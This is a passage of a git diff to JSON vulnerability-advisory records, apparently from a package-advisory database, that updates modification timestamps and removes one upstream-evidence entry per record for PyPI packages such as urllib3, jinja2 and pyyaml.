-2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudiscovery-CVE-2019-10906", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-13T16:40:09Z", + "modified": "2026-09-10T19:01:16Z", "upstream": [ "GHSA-462w-v97r-4m45", "CVE-2019-10906", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "2.11.3", - "key": "pkg:pypi/jinja2@2.11.3", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cloudiscovery-CVE-2019-11236.json b/advisories/BREW-cloudiscovery-CVE-2019-11236.json index c41d0b7ea55..9c7e4360552 100644 --- a/advisories/BREW-cloudiscovery-CVE-2019-11236.json +++ b/advisories/BREW-cloudiscovery-CVE-2019-11236.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudiscovery-CVE-2019-11236", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-13T16:40:09Z", + "modified": "2026-09-10T19:01:16Z", "upstream": [ "GHSA-r64q-w8jr-g9qp", "CVE-2019-11236", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.5.0", - "key": "pkg:pypi/urllib3@2.5.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cloudiscovery-CVE-2019-11324.json b/advisories/BREW-cloudiscovery-CVE-2019-11324.json index 9c274590bc9..78e58343aac 100644 --- a/advisories/BREW-cloudiscovery-CVE-2019-11324.json +++ b/advisories/BREW-cloudiscovery-CVE-2019-11324.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudiscovery-CVE-2019-11324", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-13T16:40:09Z", + "modified": "2026-09-10T19:01:16Z", "upstream": [ "GHSA-mh33-7rrq-662w", "CVE-2019-11324", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.5.0", - "key": "pkg:pypi/urllib3@2.5.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cloudiscovery-CVE-2019-20477.json b/advisories/BREW-cloudiscovery-CVE-2019-20477.json index 82c0073579c..ae97a6237da 100644 --- a/advisories/BREW-cloudiscovery-CVE-2019-20477.json +++ b/advisories/BREW-cloudiscovery-CVE-2019-20477.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudiscovery-CVE-2019-20477", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-13T16:40:09Z", + "modified": "2026-09-10T19:01:16Z", "upstream": [ "GHSA-3pqx-4fqf-j49f", "CVE-2019-20477", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.2", - "key": "pkg:pypi/pyyaml@6.0.2", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cloudiscovery-CVE-2020-14343.json b/advisories/BREW-cloudiscovery-CVE-2020-14343.json index 2d8929c46ae..c46be6b0487 100644 --- a/advisories/BREW-cloudiscovery-CVE-2020-14343.json +++ b/advisories/BREW-cloudiscovery-CVE-2020-14343.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudiscovery-CVE-2020-14343", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-13T16:40:09Z", + "modified": "2026-09-10T19:01:16Z", "upstream": [ "GHSA-8q59-q68h-6hv4", "CVE-2020-14343", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.2", - "key": "pkg:pypi/pyyaml@6.0.2", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cloudiscovery-CVE-2020-1747.json b/advisories/BREW-cloudiscovery-CVE-2020-1747.json index ca8e8167ab8..89a8f229e54 100644 --- a/advisories/BREW-cloudiscovery-CVE-2020-1747.json +++ b/advisories/BREW-cloudiscovery-CVE-2020-1747.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudiscovery-CVE-2020-1747", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-13T16:40:09Z", + "modified": "2026-09-10T19:01:16Z", "upstream": [ "GHSA-6757-jp84-gxfx", "CVE-2020-1747", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.2", - "key": "pkg:pypi/pyyaml@6.0.2", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cloudiscovery-CVE-2020-26137.json b/advisories/BREW-cloudiscovery-CVE-2020-26137.json index 9d1dafa5890..0b26a2cb401 100644 --- a/advisories/BREW-cloudiscovery-CVE-2020-26137.json +++ b/advisories/BREW-cloudiscovery-CVE-2020-26137.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudiscovery-CVE-2020-26137", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-13T16:40:09Z", + "modified": "2026-09-10T19:01:16Z", "upstream": [ "GHSA-wqvq-5m8c-6g24", "CVE-2020-26137", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.5.0", - "key": "pkg:pypi/urllib3@2.5.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cloudiscovery-CVE-2020-28493.json b/advisories/BREW-cloudiscovery-CVE-2020-28493.json index 68d58848c9b..86af794d063 100644 --- a/advisories/BREW-cloudiscovery-CVE-2020-28493.json +++ b/advisories/BREW-cloudiscovery-CVE-2020-28493.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudiscovery-CVE-2020-28493", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-13T16:40:09Z", + "modified": "2026-09-10T19:01:16Z", "upstream": [ "GHSA-g3rq-g295-4j3m", "CVE-2020-28493", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "2.11.3", - "key": "pkg:pypi/jinja2@2.11.3", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cloudiscovery-CVE-2020-7212.json b/advisories/BREW-cloudiscovery-CVE-2020-7212.json index b3548bcd06f..b145c28dafc 100644 --- a/advisories/BREW-cloudiscovery-CVE-2020-7212.json +++ b/advisories/BREW-cloudiscovery-CVE-2020-7212.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudiscovery-CVE-2020-7212", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-13T16:40:09Z", + "modified": "2026-09-10T19:01:16Z", "upstream": [ "GHSA-hmv2-79q8-fv6g", "CVE-2020-7212", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.5.0", - "key": "pkg:pypi/urllib3@2.5.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cloudiscovery-CVE-2021-28363.json b/advisories/BREW-cloudiscovery-CVE-2021-28363.json index 7cdc35c2269..baa7cacb925 100644 --- a/advisories/BREW-cloudiscovery-CVE-2021-28363.json +++ b/advisories/BREW-cloudiscovery-CVE-2021-28363.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudiscovery-CVE-2021-28363", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-13T16:40:09Z", + "modified": "2026-09-10T19:01:16Z", "upstream": [ "GHSA-5phf-pp7p-vc2r", "CVE-2021-28363", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.5.0", - "key": "pkg:pypi/urllib3@2.5.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cloudiscovery-CVE-2021-33503.json b/advisories/BREW-cloudiscovery-CVE-2021-33503.json index f3c98ea9b79..2729299b323 100644 --- a/advisories/BREW-cloudiscovery-CVE-2021-33503.json +++ b/advisories/BREW-cloudiscovery-CVE-2021-33503.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudiscovery-CVE-2021-33503", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-13T16:40:09Z", + "modified": "2026-09-10T19:01:16Z", "upstream": [ "GHSA-q2q7-5pp4-w6pg", "CVE-2021-33503", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.5.0", - "key": "pkg:pypi/urllib3@2.5.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cloudiscovery-CVE-2023-43804.json b/advisories/BREW-cloudiscovery-CVE-2023-43804.json index dd2c147080e..02d1042cd2a 100644 --- a/advisories/BREW-cloudiscovery-CVE-2023-43804.json +++ b/advisories/BREW-cloudiscovery-CVE-2023-43804.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudiscovery-CVE-2023-43804", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-13T16:40:09Z", + "modified": "2026-09-10T19:01:16Z", "upstream": [ "GHSA-v845-jxx5-vc9f", "CVE-2023-43804", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.5.0", - "key": "pkg:pypi/urllib3@2.5.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cloudiscovery-CVE-2023-45803.json b/advisories/BREW-cloudiscovery-CVE-2023-45803.json index 5d676d8309d..6e81e9e6957 100644 --- a/advisories/BREW-cloudiscovery-CVE-2023-45803.json +++ b/advisories/BREW-cloudiscovery-CVE-2023-45803.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudiscovery-CVE-2023-45803", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-13T16:40:09Z", + "modified": "2026-09-10T19:01:16Z", "upstream": [ "GHSA-g4mx-q9vg-27p4", "CVE-2023-45803", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.5.0", - "key": "pkg:pypi/urllib3@2.5.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cloudiscovery-CVE-2024-22195.json b/advisories/BREW-cloudiscovery-CVE-2024-22195.json index 7ec55c59e29..b893ed0d007 100644 --- a/advisories/BREW-cloudiscovery-CVE-2024-22195.json +++ b/advisories/BREW-cloudiscovery-CVE-2024-22195.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudiscovery-CVE-2024-22195", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-13T16:40:09Z", + "modified": "2026-09-10T19:01:16Z", "upstream": [ "GHSA-h5c8-rqwp-cp95", "CVE-2024-22195", @@ -39,14 +39,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "2.11.3", - "key": "pkg:pypi/jinja2@2.11.3", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cloudiscovery-CVE-2024-34064.json b/advisories/BREW-cloudiscovery-CVE-2024-34064.json index 31b347035c4..a2994642883 100644 --- a/advisories/BREW-cloudiscovery-CVE-2024-34064.json +++ b/advisories/BREW-cloudiscovery-CVE-2024-34064.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudiscovery-CVE-2024-34064", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-13T16:40:09Z", + "modified": "2026-09-10T19:01:16Z", "upstream": [ "GHSA-h75v-3vvj-5mfj", "CVE-2024-34064", @@ -39,14 +39,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "2.11.3", - "key": "pkg:pypi/jinja2@2.11.3", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cloudiscovery-CVE-2024-37891.json b/advisories/BREW-cloudiscovery-CVE-2024-37891.json index c6a8205972d..6f519adb3e5 100644 --- a/advisories/BREW-cloudiscovery-CVE-2024-37891.json +++ b/advisories/BREW-cloudiscovery-CVE-2024-37891.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudiscovery-CVE-2024-37891", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-13T16:40:09Z", + "modified": "2026-09-10T19:01:16Z", "upstream": [ "GHSA-34jh-p97f-mpxf", "CVE-2024-37891", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.5.0", - "key": "pkg:pypi/urllib3@2.5.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cloudiscovery-CVE-2024-53899.json b/advisories/BREW-cloudiscovery-CVE-2024-53899.json index 1e0a37fdaae..fa0687acd2c 100644 --- a/advisories/BREW-cloudiscovery-CVE-2024-53899.json +++ b/advisories/BREW-cloudiscovery-CVE-2024-53899.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudiscovery-CVE-2024-53899", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-13T16:40:09Z", + "modified": "2026-09-10T19:01:16Z", "upstream": [ "GHSA-rqc4-2hc7-8c8v", "BIT-virtualenv-2024-53899", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "virtualenv", - "subject_version": "20.31.2", - "key": "pkg:pypi/virtualenv@20.31.2", - "resource": "virtualenv" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cloudiscovery-CVE-2024-56326.json b/advisories/BREW-cloudiscovery-CVE-2024-56326.json index 79b79b97951..d7f7088c6c1 100644 --- a/advisories/BREW-cloudiscovery-CVE-2024-56326.json +++ b/advisories/BREW-cloudiscovery-CVE-2024-56326.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudiscovery-CVE-2024-56326", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-13T16:40:09Z", + "modified": "2026-09-10T19:01:16Z", "upstream": [ "GHSA-q2x7-8rv6-6q7h", "CVE-2024-56326", @@ -39,14 +39,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "2.11.3", - "key": "pkg:pypi/jinja2@2.11.3", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cloudiscovery-CVE-2025-27516.json b/advisories/BREW-cloudiscovery-CVE-2025-27516.json index 02ae406c303..a00e5d5eeb0 100644 --- a/advisories/BREW-cloudiscovery-CVE-2025-27516.json +++ b/advisories/BREW-cloudiscovery-CVE-2025-27516.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudiscovery-CVE-2025-27516", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-13T16:40:09Z", + "modified": "2026-09-10T19:01:16Z", "upstream": [ "GHSA-cpwx-vrp4-4pq7", "CVE-2025-27516", @@ -39,14 +39,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "2.11.3", - "key": "pkg:pypi/jinja2@2.11.3", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cloudiscovery-CVE-2025-50181.json b/advisories/BREW-cloudiscovery-CVE-2025-50181.json index 3c91331ce9e..e0389ac3f9a 100644 --- a/advisories/BREW-cloudiscovery-CVE-2025-50181.json +++ b/advisories/BREW-cloudiscovery-CVE-2025-50181.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudiscovery-CVE-2025-50181", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-13T16:40:09Z", + "modified": "2026-09-10T19:01:16Z", "upstream": [ "GHSA-pq67-6m6q-mj2v", "CVE-2025-50181", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.5.0", - "key": "pkg:pypi/urllib3@2.5.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cloudiscovery-CVE-2025-50182.json b/advisories/BREW-cloudiscovery-CVE-2025-50182.json index f5335ece353..33078abd9ce 100644 --- a/advisories/BREW-cloudiscovery-CVE-2025-50182.json +++ b/advisories/BREW-cloudiscovery-CVE-2025-50182.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudiscovery-CVE-2025-50182", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-13T16:40:09Z", + "modified": "2026-09-10T19:01:16Z", "upstream": [ "GHSA-48p4-8xcf-vxj5", "CVE-2025-50182", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.5.0", - "key": "pkg:pypi/urllib3@2.5.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cloudiscovery-CVE-2025-66418.json b/advisories/BREW-cloudiscovery-CVE-2025-66418.json index 4b83fcd5585..ee1c7d9d056 100644 --- a/advisories/BREW-cloudiscovery-CVE-2025-66418.json +++ b/advisories/BREW-cloudiscovery-CVE-2025-66418.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudiscovery-CVE-2025-66418", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-13T16:40:09Z", + "modified": "2026-09-10T19:01:16Z", "upstream": [ "GHSA-gm62-xv2j-4w53", "CVE-2025-66418", @@ -39,14 +39,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.5.0", - "key": "pkg:pypi/urllib3@2.5.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cloudiscovery-CVE-2025-66471.json b/advisories/BREW-cloudiscovery-CVE-2025-66471.json index 47e2cde3a93..6a522ce8643 100644 --- a/advisories/BREW-cloudiscovery-CVE-2025-66471.json +++ b/advisories/BREW-cloudiscovery-CVE-2025-66471.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudiscovery-CVE-2025-66471", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-13T16:40:09Z", + "modified": "2026-09-10T19:01:16Z", "upstream": [ "GHSA-2xpw-w6gg-jr37", "CVE-2025-66471", @@ -39,14 +39,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.5.0", - "key": "pkg:pypi/urllib3@2.5.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cloudiscovery-CVE-2025-68146.json b/advisories/BREW-cloudiscovery-CVE-2025-68146.json index 8bead7d7df6..0329ab2bb65 100644 --- a/advisories/BREW-cloudiscovery-CVE-2025-68146.json +++ b/advisories/BREW-cloudiscovery-CVE-2025-68146.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudiscovery-CVE-2025-68146", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-13T16:40:09Z", + "modified": "2026-09-10T19:01:16Z", "upstream": [ "GHSA-w853-jp5j-5j7f", "CVE-2025-68146", @@ -39,14 +39,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "filelock", - "subject_version": "3.18.0", - "key": "pkg:pypi/filelock@3.18.0", - "resource": "filelock" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cloudiscovery-CVE-2025-69872.json b/advisories/BREW-cloudiscovery-CVE-2025-69872.json index d9ca57ac243..fe86b256f4f 100644 --- a/advisories/BREW-cloudiscovery-CVE-2025-69872.json +++ b/advisories/BREW-cloudiscovery-CVE-2025-69872.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudiscovery-CVE-2025-69872", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-13T16:40:09Z", + "modified": "2026-09-10T19:01:16Z", "upstream": [ "GHSA-w8v5-vhqr-4h9v", "CVE-2025-69872", @@ -38,14 +38,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "diskcache", - "subject_version": "5.6.3", - "key": "pkg:pypi/diskcache@5.6.3", - "resource": "diskcache" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cloudiscovery-CVE-2026-21441.json b/advisories/BREW-cloudiscovery-CVE-2026-21441.json index 83e27af7433..84201e16cff 100644 --- a/advisories/BREW-cloudiscovery-CVE-2026-21441.json +++ b/advisories/BREW-cloudiscovery-CVE-2026-21441.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudiscovery-CVE-2026-21441", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-13T16:40:09Z", + "modified": "2026-09-10T19:01:16Z", "upstream": [ "GHSA-38jv-5279-wg99", "CVE-2026-21441", @@ -39,14 +39,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.5.0", - "key": "pkg:pypi/urllib3@2.5.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cloudiscovery-CVE-2026-22701.json b/advisories/BREW-cloudiscovery-CVE-2026-22701.json index 75e4812d4a1..f7bd96b1c83 100644 --- a/advisories/BREW-cloudiscovery-CVE-2026-22701.json +++ b/advisories/BREW-cloudiscovery-CVE-2026-22701.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudiscovery-CVE-2026-22701", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-13T16:40:09Z", + "modified": "2026-09-10T19:01:16Z", "upstream": [ "GHSA-qmgc-5h2g-mvrw", "CVE-2026-22701", @@ -39,14 +39,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "filelock", - "subject_version": "3.18.0", - "key": "pkg:pypi/filelock@3.18.0", - "resource": "filelock" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cloudiscovery-CVE-2026-22702.json b/advisories/BREW-cloudiscovery-CVE-2026-22702.json index a4f1577a394..401bf179e7b 100644 --- a/advisories/BREW-cloudiscovery-CVE-2026-22702.json +++ b/advisories/BREW-cloudiscovery-CVE-2026-22702.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudiscovery-CVE-2026-22702", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-13T16:40:09Z", + "modified": "2026-09-10T19:01:16Z", "upstream": [ "GHSA-597g-3phw-6986", "BIT-virtualenv-2026-22702", @@ -40,14 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "virtualenv", - "subject_version": "20.31.2", - "key": "pkg:pypi/virtualenv@20.31.2", - "resource": "virtualenv" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cloudiscovery-CVE-2026-44431.json b/advisories/BREW-cloudiscovery-CVE-2026-44431.json index bca9b6f8f6b..e10d0121a19 100644 --- a/advisories/BREW-cloudiscovery-CVE-2026-44431.json +++ b/advisories/BREW-cloudiscovery-CVE-2026-44431.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudiscovery-CVE-2026-44431", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-13T16:40:09Z", + "modified": "2026-09-10T19:01:16Z", "upstream": [ "GHSA-qccp-gfcp-xxvc", "CVE-2026-44431", @@ -39,14 +39,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.5.0", - "key": "pkg:pypi/urllib3@2.5.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-darker-CVE-2024-21503.json b/advisories/BREW-darker-CVE-2024-21503.json index dd7c94cd047..871b52934f4 100644 --- a/advisories/BREW-darker-CVE-2024-21503.json +++ b/advisories/BREW-darker-CVE-2024-21503.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-darker-CVE-2024-21503", "published": "2026-08-13T16:42:09Z", - "modified": "2026-08-13T16:42:09Z", + "modified": "2026-09-10T19:04:13Z", "upstream": [ "GHSA-fj7x-q9j7-g6q6", "CVE-2024-21503", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "black", - "subject_version": "26.5.1", - "key": "pkg:pypi/black@26.5.1", - "resource": "black" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-darker-CVE-2026-32274.json b/advisories/BREW-darker-CVE-2026-32274.json index c32f5a7fea0..bbdaf9e93ea 100644 --- a/advisories/BREW-darker-CVE-2026-32274.json +++ b/advisories/BREW-darker-CVE-2026-32274.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-darker-CVE-2026-32274", "published": "2026-08-13T16:42:09Z", - "modified": "2026-08-13T16:42:09Z", + "modified": "2026-09-10T19:04:13Z", "upstream": [ "GHSA-3936-cmfr-pm3m", "CVE-2026-32274", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "black", - "subject_version": "26.5.1", - "key": "pkg:pypi/black@26.5.1", - "resource": "black" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-hapless-CVE-2015-8557.json b/advisories/BREW-hapless-CVE-2015-8557.json index 0b43c3afa94..6c97a3e8dff 100644 --- a/advisories/BREW-hapless-CVE-2015-8557.json +++ b/advisories/BREW-hapless-CVE-2015-8557.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-hapless-CVE-2015-8557", "published": "2026-08-13T16:55:33Z", - "modified": "2026-08-13T16:55:33Z", + "modified": "2026-09-10T19:24:31Z", "upstream": [ "GHSA-fff8-4w9p-7v76", "CVE-2015-8557", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-hapless-CVE-2019-18874.json b/advisories/BREW-hapless-CVE-2019-18874.json index a9fadc991b5..1661982651e 100644 --- a/advisories/BREW-hapless-CVE-2019-18874.json +++ b/advisories/BREW-hapless-CVE-2019-18874.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-hapless-CVE-2019-18874", "published": "2026-08-13T16:55:33Z", - "modified": "2026-08-13T16:55:33Z", + "modified": "2026-09-10T19:24:31Z", "upstream": [ "GHSA-qfc5-mcwq-26q8", "CVE-2019-18874", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "psutil", - "subject_version": "6.1.1", - "key": "pkg:pypi/psutil@6.1.1", - "resource": "psutil" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-hapless-CVE-2021-20270.json b/advisories/BREW-hapless-CVE-2021-20270.json index e75bf4dfd3d..0d3307d15a1 100644 --- a/advisories/BREW-hapless-CVE-2021-20270.json +++ b/advisories/BREW-hapless-CVE-2021-20270.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-hapless-CVE-2021-20270", "published": "2026-08-13T16:55:33Z", - "modified": 